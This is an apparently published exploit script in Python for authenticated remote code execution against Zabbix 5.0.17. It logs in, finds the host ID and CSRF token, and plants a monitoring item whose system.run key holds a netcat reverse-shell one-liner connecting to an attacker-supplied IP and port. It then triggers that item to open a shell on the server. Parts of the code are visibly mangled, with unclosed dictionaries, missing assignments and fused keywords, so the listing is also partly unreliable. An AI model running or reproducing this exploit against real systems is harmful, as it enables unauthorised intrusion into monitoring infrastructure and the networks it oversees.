# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
# note : this is blind RCE so don't expect to see results on the site
# this exploit is tested against Zabbix 5.0.17 only
import sys
import requests
import re
import random
import string
import colorama
from colorama import Fore
print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")
def item_name() :
letters = string.ascii_letters
item =''.join(random.choice(letters) for i in range(20))
return item
if len(sys.argv) != 6 :
print(Fore.RED +"[!] usage : ./expoit.py <target url><username> <password> <attacker ip> <attacker port>")
url= sys.argv[1]
username =sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]
s = requests.Session()
headers ={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
data = {
"name": username ,
"password" : password ,
"autologin" :"1" ,
proxies = {
'http': ''
r = s.post(url+"/index.php",data=data)#proxies=proxies)
if "Sign out" not in r.text :
print(Fore.RED +"[!] Authentication failed")
if "Zabbix 5.0.17" not in r.text :
print(Fore.RED +"[!] This is not Zabbix 5.0.17")
if "filter_hostids%5B0%5D=" in r.text :
try :
x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
hostId = x.group(1)
except :
print(Fore.RED +"[!] Exploit failed to resolve HostID")
print(Fore.BLUE +"[?] you can find it under /items then add item")
else :
print(Fore.RED +"[!] Exploit failed to resolve HostID")
print(Fore.BLUE +"[?] you can find HostID under /items then add item")
sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token
command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port}>/tmp/f"
payload = f"system.run[{command},nowait]"
Random_name = item_name()
data2 ={
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )
no_pages= r2.text.count("?page=")
#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
while page <= no_pages :
r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
ifRandom_name in r_page.text :
print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
try :
except :
print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
else :
page +=1
if flag==False :
print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
print(Fore.BLUE +"[*] change the port and try again")
#################################################[Executing the item]#################################################
data2["form"] ="update"
data2["selectedInterfaceId"] = "1"
print(Fore.GREEN+f"[+] set the listener at {port} please...")
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )
print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")
if "y" in answer.lower() :
print(Fore.GREEN+"Nice !")
else :
print(Fore.RED+"[!] if you find out why please contact me ")